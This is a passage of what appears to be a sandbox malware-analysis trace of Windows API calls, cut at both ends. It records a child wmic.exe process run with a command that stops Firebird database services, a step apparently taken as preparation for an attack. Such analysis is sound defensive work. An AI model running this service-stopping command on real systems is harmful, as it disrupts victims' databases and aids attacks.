Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0249.097] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0249.097] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0249.097] free (_Block=0x3ccf90) [0249.097] free (_Block=0x3cdd50) [0249.097] ??1CHString@@QEAA@XZ () returned 0x53104d01 [0249.097] WbemLocator:IUnknown:Release (This=0x1d03b28) returned 0x0 [0249.098] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0249.098] _kbhit () returned 0x0 [0249.098] free (_Block=0x3c7140) [0249.099] free (_Block=0x3ccac0) [0249.099] free (_Block=0x3ccaa0) [0249.099] free (_Block=0x3cca80) [0249.099] free (_Block=0x3cca60) [0249.099] free (_Block=0x3cce10) [0249.099] free (_Block=0x3ccf60) [0249.099] free (_Block=0x3c7110) [0249.099] free (_Block=0x3c8680) [0249.099] free (_Block=0x3ccb60) [0249.099] free (_Block=0x3ccb80) [0249.099] free (_Block=0x3c6e70) [0249.099] free (_Block=0x3cd500) [0249.099] free (_Block=0x3ccba0) [0249.099] free (_Block=0x3ccc00) [0249.099] free (_Block=0x3cd480) [0249.099] free (_Block=0x3cd400) [0249.099] free (_Block=0x3ccbe0) [0249.099] free (_Block=0x3ccbc0) [0249.099] free (_Block=0x3ccc20) [0249.099] free (_Block=0x3cd3a0) [0249.099] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0249.099] free (_Block=0x3ccea0) [0249.099] free (_Block=0x3ccb00) [0249.099] free (_Block=0x3ccf30) [0249.100] free (_Block=0x3ccb40) [0249.100] free (_Block=0x3c8600) [0249.100] free (_Block=0x3ccb20) [0249.100] free (_Block=0x3ccae0) [0249.100] free (_Block=0x3c7f60) [0249.100] free (_Block=0x3c6970) [0249.100] free (_Block=0x3c69c0) [0249.100] free (_Block=0x3ccc40) [0249.100] free (_Block=0x3c6a90) [0249.100] free (_Block=0x3c6e50) [0249.100] free (_Block=0x3c8040) [0249.100] free (_Block=0x3c6e30) [0249.100] free (_Block=0x3c8000) [0249.100] free (_Block=0x3c6dd0) [0249.100] free (_Block=0x3c6df0) [0249.100] free (_Block=0x3c6cb0) [0249.100] free (_Block=0x3c6cd0) [0249.100] free (_Block=0x3c6c50) [0249.100] free (_Block=0x3c6c70) [0249.100] free (_Block=0x3c6d10) [0249.100] free (_Block=0x3c6d30) [0249.100] free (_Block=0x3c6d70) [0249.100] free (_Block=0x3c6d90) [0249.101] free (_Block=0x3c6b90) [0249.101] free (_Block=0x3c6bb0) [0249.101] free (_Block=0x3c6b30) [0249.101] free (_Block=0x3c6b50) [0249.101] free (_Block=0x3c6bf0) [0249.101] free (_Block=0x3c6c10) [0249.101] free (_Block=0x3c6ad0) [0249.101] free (_Block=0x3c6af0) [0249.101] free (_Block=0x3c6a40) [0249.101] free (_Block=0x3c6a10) [0249.101] free (_Block=0x3c6f00) [0249.101] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x2 [0249.101] WbemLocator:IUnknown:Release (This=0x1d03a98) returned 0x0 [0249.102] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x1 [0249.102] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0249.102] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x0 [0249.102] free (_Block=0x3cc9e0) [0249.102] free (_Block=0x3cca00) [0249.102] free (_Block=0x3c8540) [0249.102] free (_Block=0x3cca20) [0249.102] free (_Block=0x3cca40) [0249.102] free (_Block=0x3c8580) [0249.102] free (_Block=0x3cc860) [0249.102] free (_Block=0x3cc880) [0249.102] free (_Block=0x3c83c0) [0249.102] free (_Block=0x3cc8a0) [0249.103] free (_Block=0x3cc8c0) [0249.103] free (_Block=0x3c8400) [0249.103] free (_Block=0x3cc7e0) [0249.103] free (_Block=0x3cc800) [0249.103] free (_Block=0x3c8340) [0249.103] free (_Block=0x3cc820) [0249.103] free (_Block=0x3cc840) [0249.103] free (_Block=0x3c8380) [0249.103] free (_Block=0x3cc960) [0249.103] free (_Block=0x3cc980) [0249.103] free (_Block=0x3c84c0) [0249.103] free (_Block=0x3cc9a0) [0249.103] free (_Block=0x3cc9c0) [0249.103] free (_Block=0x3c8500) [0249.103] free (_Block=0x3cc760) [0249.103] free (_Block=0x3cc780) [0249.103] free (_Block=0x3c82c0) [0249.103] free (_Block=0x3cc7a0) [0249.103] free (_Block=0x3cc7c0) [0249.104] free (_Block=0x3c8300) [0249.104] free (_Block=0x3cc8e0) [0249.104] free (_Block=0x3cc900) [0249.104] free (_Block=0x3c8440) [0249.104] free (_Block=0x3cc920) [0249.104] free (_Block=0x3cc940) [0249.104] free (_Block=0x3c8480) [0249.104] free (_Block=0x3cc6a0) [0249.104] free (_Block=0x3cc6c0) [0249.104] free (_Block=0x3c8200) [0249.104] free (_Block=0x3cc560) [0249.104] free (_Block=0x3cc580) [0249.104] free (_Block=0x3c80c0) [0249.104] free (_Block=0x3c6ec0) [0249.104] free (_Block=0x3c6ee0) [0249.104] free (_Block=0x3c8080) [0249.104] free (_Block=0x3cc5e0) [0249.104] free (_Block=0x3cc600) [0249.104] free (_Block=0x3c8140) [0249.104] free (_Block=0x3cc6e0) [0249.105] free (_Block=0x3cc700) [0249.105] free (_Block=0x3c8240) [0249.105] free (_Block=0x3cc5a0) [0249.105] free (_Block=0x3cc5c0) [0249.105] free (_Block=0x3c8100) [0249.105] free (_Block=0x3cc620) [0249.105] free (_Block=0x3cc640) [0249.105] free (_Block=0x3c8180) [0249.105] free (_Block=0x3cc660) [0249.105] free (_Block=0x3cc680) [0249.105] free (_Block=0x3c81c0) [0249.105] free (_Block=0x3cc720) [0249.105] free (_Block=0x3cc740) [0249.105] free (_Block=0x3c8280) [0249.106] CoUninitialize () [0249.141] exit (_Code=0) [0249.141] free (_Block=0x3ccd30) [0249.141] free (_Block=0x3c7f20) [0249.141] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.141] free (_Block=0x3c6fb0) [0249.141] free (_Block=0x3c6ab0) [0249.141] free (_Block=0x3c7ee0) [0249.141] free (_Block=0x3c7ea0) [0249.141] free (_Block=0x3c7e50) [0249.141] free (_Block=0x3c7e10) [0249.141] free (_Block=0x3c5ac0) [0249.141] free (_Block=0x3c7d90) [0249.141] free (_Block=0x3c5a80) [0249.141] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.141] free (_Block=0x3c85c0) Thread: id = 182 os_tid = 0xb88 Thread: id = 183 os_tid = 0xb84 Thread: id = 184 os_tid = 0x69c Thread: id = 185 os_tid = 0x330 Thread: id = 186 os_tid = 0x500 Process: id = "22" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x4527c000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%firebird%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 188 os_tid = 0x2ac [0249.303] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fc70 | out: lpSystemTimeAsFileTime=0x28fc70*(dwLowDateTime=0xaa4bc1f0, dwHighDateTime=0x1d61d49)) [0249.303] GetCurrentProcessId () returned 0xb68 [0249.303] GetCurrentThreadId () returned 0x2ac [0249.303] GetTickCount () returned 0x1168170 [0249.303] QueryPerformanceCounter (in: lpPerformanceCount=0x28fc78 | out: lpPerformanceCount=0x28fc78*=36947701469) returned 1 [0249.309] GetModuleHandleW (lpModuleName=0x0) returned 0xffd40000 [0249.309] __set_app_type (_Type=0x1) [0249.309] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffd8ced0) returned 0x0 [0249.310] __wgetmainargs (in: _Argc=0xffdb2380, _Argv=0xffdb2390, _Env=0xffdb2388, _DoWildCard=0, _StartInfo=0xffdb239c | out: _Argc=0xffdb2380, _Argv=0xffdb2390, _Env=0xffdb2388) returned 0 [0249.310] ??0CHString@@QEAA@XZ () returned 0xffdb2ab0 [0249.310] malloc (_Size=0x30) returned 0x355a80 [0249.310] malloc (_Size=0x70) returned 0x357da0 [0249.310] malloc (_Size=0x50) returned 0x355ac0 [0249.310] malloc (_Size=0x30) returned 0x357e20 [0249.310] malloc (_Size=0x48) returned 0x357e60 [0249.311] malloc (_Size=0x30) returned 0x357eb0 [0249.311] malloc (_Size=0x30) returned 0x357ef0 [0249.311] ??0CHString@@QEAA@XZ () returned 0xffdb2f58 [0249.311] malloc (_Size=0x30) returned 0x357f30 [0249.311] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0249.311] SetConsoleCtrlHandler (HandlerRoutine=0xffd85724, Add=1) returned 1 [0249.311] _onexit (_Func=0xffd9f378) returned 0xffd9f378 [0249.311] _onexit (_Func=0xffd9f490) returned 0xffd9f490 [0249.311] _onexit (_Func=0xffd9f4d0) returned 0xffd9f4d0 [0249.311] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0249.311] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0249.315] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0249.327] CoCreateInstance (in: rclsid=0xffd473a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffd47370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffdb2940 | out: ppv=0xffdb2940*=0x1ea1390) returned 0x0 [0249.338] GetCurrentProcess () returned 0xffffffffffffffff [0249.338] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28fa40 | out: TokenHandle=0x28fa40*=0xf4) returned 1 [0249.338] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28fa38 | out: TokenInformation=0x0, ReturnLength=0x28fa38) returned 0 [0249.338] malloc (_Size=0x118) returned 0x356980 [0249.338] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x356980, TokenInformationLength=0x118, ReturnLength=0x28fa38 | out: TokenInformation=0x356980, ReturnLength=0x28fa38) returned 1 [0249.338] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x356980*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1182181144, Attributes=0xd131), (Luid.LowPart=0x0, Luid.HighPart=3506032, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0249.339] free (_Block=0x356980) [0249.339] CloseHandle (hObject=0xf4) returned 1 [0249.339] malloc (_Size=0x40) returned 0x357f70 [0249.339] malloc (_Size=0x40) returned 0x356980 [0249.339] malloc (_Size=0x40) returned 0x3569d0 [0249.339] malloc (_Size=0x20a) returned 0x356a20 [0249.339] GetSystemDirectoryW (in: lpBuffer=0x356a20, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0249.339] free (_Block=0x356a20) [0249.339] malloc (_Size=0x18) returned 0x356a20 [0249.339] malloc (_Size=0x18) returned 0x356a40 [0249.339] malloc (_Size=0x18) returned 0x356a60 [0249.339] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0249.339] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0249.340] free (_Block=0x356a20) [0249.340] free (_Block=0x356a40) [0249.340] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0249.340] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0249.340] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0249.340] FreeLibrary (hLibModule=0x77940000) returned 1 [0249.341] free (_Block=0x356a60) [0249.341] _vsnwprintf (in: _Buffer=0x3569d0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x28f668 | out: _Buffer="ms_409") returned 6 [0249.341] malloc (_Size=0x20) returned 0x356a20 [0249.341] GetComputerNameW (in: lpBuffer=0x356a20, nSize=0x28fa40 | out: lpBuffer="XDUWTFONO", nSize=0x28fa40) returned 1 [0249.341] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.341] malloc (_Size=0x14) returned 0x356a50 [0249.341] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.341] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x28fa38 | out: lpNameBuffer=0x0, nSize=0x28fa38) returned 0x7fffffdd000 [0249.342] GetLastError () returned 0xea [0249.342] malloc (_Size=0x40) returned 0x356a70 [0249.342] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x356a70, nSize=0x28fa38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28fa38) returned 0x1 [0249.342] lstrlenW (lpString="") returned 0 [0249.342] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.342] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0249.344] lstrlenW (lpString=".") returned 1 [0249.344] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.344] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0249.344] lstrlenW (lpString="LOCALHOST") returned 9 [0249.344] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.344] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0249.345] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.345] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.345] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0249.345] free (_Block=0x356a50) [0249.345] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.345] malloc (_Size=0x14) returned 0x356a50 [0249.345] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.345] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.345] malloc (_Size=0x14) returned 0x356ac0 [0249.345] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.345] malloc (_Size=0x8) returned 0x356ae0 [0249.345] malloc (_Size=0x18) returned 0x356b00 [0249.345] malloc (_Size=0x30) returned 0x356b20 [0249.345] malloc (_Size=0x18) returned 0x356b60 [0249.345] SysStringLen (param_1="IDENTIFY") returned 0x8 [0249.345] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0249.345] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0249.345] SysStringLen (param_1="IDENTIFY") returned 0x8 [0249.345] malloc (_Size=0x30) returned 0x356b80 [0249.345] malloc (_Size=0x18) returned 0x356bc0 [0249.345] SysStringLen (param_1="IMPERSONATE") returned 0xb [0249.345] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0249.345] SysStringLen (param_1="IMPERSONATE") returned 0xb [0249.346] SysStringLen (param_1="IDENTIFY") returned 0x8 [0249.346] SysStringLen (param_1="IDENTIFY") returned 0x8 [0249.346] SysStringLen (param_1="IMPERSONATE") returned 0xb [0249.346] malloc (_Size=0x30) returned 0x356be0 [0249.346] malloc (_Size=0x18) returned 0x356c20 [0249.346] SysStringLen (param_1="DELEGATE") returned 0x8 [0249.346] SysStringLen (param_1="IDENTIFY") returned 0x8 [0249.346] SysStringLen (param_1="DELEGATE") returned 0x8 [0249.346] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0249.346] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0249.346] SysStringLen (param_1="DELEGATE") returned 0x8 [0249.346] malloc (_Size=0x30) returned 0x356c40 [0249.346] malloc (_Size=0x18) returned 0x356c80 [0249.346] malloc (_Size=0x30) returned 0x356ca0 [0249.346] malloc (_Size=0x18) returned 0x356ce0 [0249.346] SysStringLen (param_1="NONE") returned 0x4 [0249.346] SysStringLen (param_1="DEFAULT") returned 0x7 [0249.346] SysStringLen (param_1="DEFAULT") returned 0x7 [0249.346] SysStringLen (param_1="NONE") returned 0x4 [0249.346] malloc (_Size=0x30) returned 0x356d00 [0249.346] malloc (_Size=0x18) returned 0x356d40 [0249.346] SysStringLen (param_1="CONNECT") returned 0x7 [0249.346] SysStringLen (param_1="DEFAULT") returned 0x7 [0249.346] malloc (_Size=0x30) returned 0x356d60 [0249.346] malloc (_Size=0x18) returned 0x356da0 [0249.346] SysStringLen (param_1="CALL") returned 0x4 [0249.346] SysStringLen (param_1="DEFAULT") returned 0x7 [0249.346] SysStringLen (param_1="CALL") returned 0x4 [0249.346] SysStringLen (param_1="CONNECT") returned 0x7 [0249.347] malloc (_Size=0x30) returned 0x356dc0 [0249.347] malloc (_Size=0x18) returned 0x356e00 [0249.347] SysStringLen (param_1="PKT") returned 0x3 [0249.347] SysStringLen (param_1="DEFAULT") returned 0x7 [0249.347] SysStringLen (param_1="PKT") returned 0x3 [0249.347] SysStringLen (param_1="NONE") returned 0x4 [0249.347] SysStringLen (param_1="NONE") returned 0x4 [0249.347] SysStringLen (param_1="PKT") returned 0x3 [0249.347] malloc (_Size=0x30) returned 0x356e20 [0249.347] malloc (_Size=0x18) returned 0x356e60 [0249.347] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0249.347] SysStringLen (param_1="DEFAULT") returned 0x7 [0249.347] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0249.347] SysStringLen (param_1="NONE") returned 0x4 [0249.347] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0249.347] SysStringLen (param_1="PKT") returned 0x3 [0249.347] SysStringLen (param_1="PKT") returned 0x3 [0249.347] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0249.347] malloc (_Size=0x30) returned 0x358000 [0249.348] malloc (_Size=0x18) returned 0x356e80 [0249.348] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0249.348] SysStringLen (param_1="DEFAULT") returned 0x7 [0249.348] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0249.348] SysStringLen (param_1="PKT") returned 0x3 [0249.348] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0249.348] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0249.348] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0249.348] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0249.348] malloc (_Size=0x30) returned 0x358040 [0249.348] malloc (_Size=0x40) returned 0x356ea0 [0249.348] malloc (_Size=0x20a) returned 0x356ef0 [0249.349] GetSystemDirectoryW (in: lpBuffer=0x356ef0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0249.349] free (_Block=0x356ef0) [0249.349] malloc (_Size=0x18) returned 0x356ef0 [0249.349] malloc (_Size=0x18) returned 0x356f10 [0249.349] malloc (_Size=0x18) returned 0x356f30 [0249.349] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0249.349] SysStringLen (param_1="\\wbem\\") returned 0x6 [0249.349] free (_Block=0x356ef0) [0249.349] free (_Block=0x356f10) [0249.349] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0249.349] free (_Block=0x356f30) [0249.349] malloc (_Size=0x18) returned 0x356ef0 [0249.349] malloc (_Size=0x18) returned 0x356f10 [0249.349] malloc (_Size=0x18) returned 0x356f30 [0249.349] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0249.349] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0249.349] free (_Block=0x356ef0) [0249.350] free (_Block=0x356f10) [0249.350] GetCurrentThreadId () returned 0x2ac [0249.350] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x28f340 | out: phkResult=0x28f340*=0xf8) returned 0x0 [0249.350] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x28f390, lpcbData=0x28f330*=0x400 | out: lpType=0x0, lpData=0x28f390*=0x30, lpcbData=0x28f330*=0x4) returned 0x0 [0249.350] _wcsicmp (_String1="0", _String2="1") returned -1 [0249.350] _wcsicmp (_String1="0", _String2="2") returned -2 [0249.350] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x28f330*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x28f330*=0x42) returned 0x0 [0249.350] malloc (_Size=0x86) returned 0x356f50 [0249.350] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x356f50, lpcbData=0x28f330*=0x42 | out: lpType=0x0, lpData=0x356f50*=0x25, lpcbData=0x28f330*=0x42) returned 0x0 [0249.350] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0249.350] malloc (_Size=0x42) returned 0x356fe0 [0249.350] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0249.350] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x28f390, lpcbData=0x28f330*=0x400 | out: lpType=0x0, lpData=0x28f390*=0x36, lpcbData=0x28f330*=0xc) returned 0x0 [0249.350] _wtol (_String="65536") returned 65536 [0249.350] free (_Block=0x356f50) [0249.350] RegCloseKey (hKey=0x0) returned 0x6 [0249.350] CoCreateInstance (in: rclsid=0xffd47410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffd473f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x28f838 | out: ppv=0x28f838*=0x23b71d0) returned 0x0 [0249.372] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x23b71d0, xmlSource=0x28f980*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x356ef0), isSuccessful=0x28f9f0 | out: isSuccessful=0x28f9f0*=0xffff) returned 0x0 [0249.549] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x23b71d0, DOMElement=0x28f830 | out: DOMElement=0x28f830*=0x23bbc50) returned 0x0 [0249.550] malloc (_Size=0x18) returned 0x35c560 [0249.550] IXMLDOMElement:getElementsByTagName (in: This=0x23bbc50, tagName="XSLFORMAT", resultList=0x28f840 | out: resultList=0x28f840*=0x23b9cc0) returned 0x0 [0249.551] free (_Block=0x35c560) [0249.551] IXMLDOMNodeList:get_length (in: This=0x23b9cc0, listLength=0x28fa08 | out: listLength=0x28fa08*=21) returned 0x0 [0249.551] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=0, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.552] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="texttable.xsl") returned 0x0 [0249.552] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.552] malloc (_Size=0x18) returned 0x35c560 [0249.552] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.552] free (_Block=0x35c560) [0249.552] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0249.552] malloc (_Size=0x18) returned 0x35c560 [0249.552] malloc (_Size=0x18) returned 0x35c580 [0249.552] malloc (_Size=0x30) returned 0x358080 [0249.553] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.553] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.553] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.553] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=1, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.553] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="textvaluelist.xsl") returned 0x0 [0249.553] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.553] malloc (_Size=0x18) returned 0x35c5a0 [0249.553] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.553] free (_Block=0x35c5a0) [0249.553] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0249.553] malloc (_Size=0x18) returned 0x35c5a0 [0249.553] malloc (_Size=0x18) returned 0x35c5c0 [0249.553] SysStringLen (param_1="VALUE") returned 0x5 [0249.553] SysStringLen (param_1="TABLE") returned 0x5 [0249.554] SysStringLen (param_1="TABLE") returned 0x5 [0249.554] SysStringLen (param_1="VALUE") returned 0x5 [0249.554] malloc (_Size=0x30) returned 0x3580c0 [0249.554] IUnknown:Release (This=0x23bbd50) returned 0x0 [0249.554] IUnknown:Release (This=0x23b78d0) returned 0x0 [0249.554] IUnknown:Release (This=0x23ba280) returned 0x0 [0249.554] IXMLDOMNodeList:get_item (in: This=0x23b9cc0, index=2, listItem=0x28f810 | out: listItem=0x28f810*=0x23bbd50) returned 0x0 [0249.554] IXMLDOMNode:get_text (in: This=0x23bbd50, text=0x28f820 | out: text=0x28f820*="textvaluelist.xsl") returned 0x0 [0249.554] IXMLDOMNode:get_attributes (in: This=0x23bbd50, attributeMap=0x28f818 | out: attributeMap=0x28f818*=0x23b78d0) returned 0x0 [0249.554] malloc (_Size=0x18) returned 0x35c5e0 [0249.554] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23b78d0, name="KEYWORD", namedItem=0x28f828 | out: namedItem=0x28f828*=0x23ba280) returned 0x0 [0249.554] free (_Block=0x35c5e0) [0249.554] IXMLDOMNode:get_nodeValue (in: This=0x23ba280, value=0x28f860 | out: value=0x28f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", 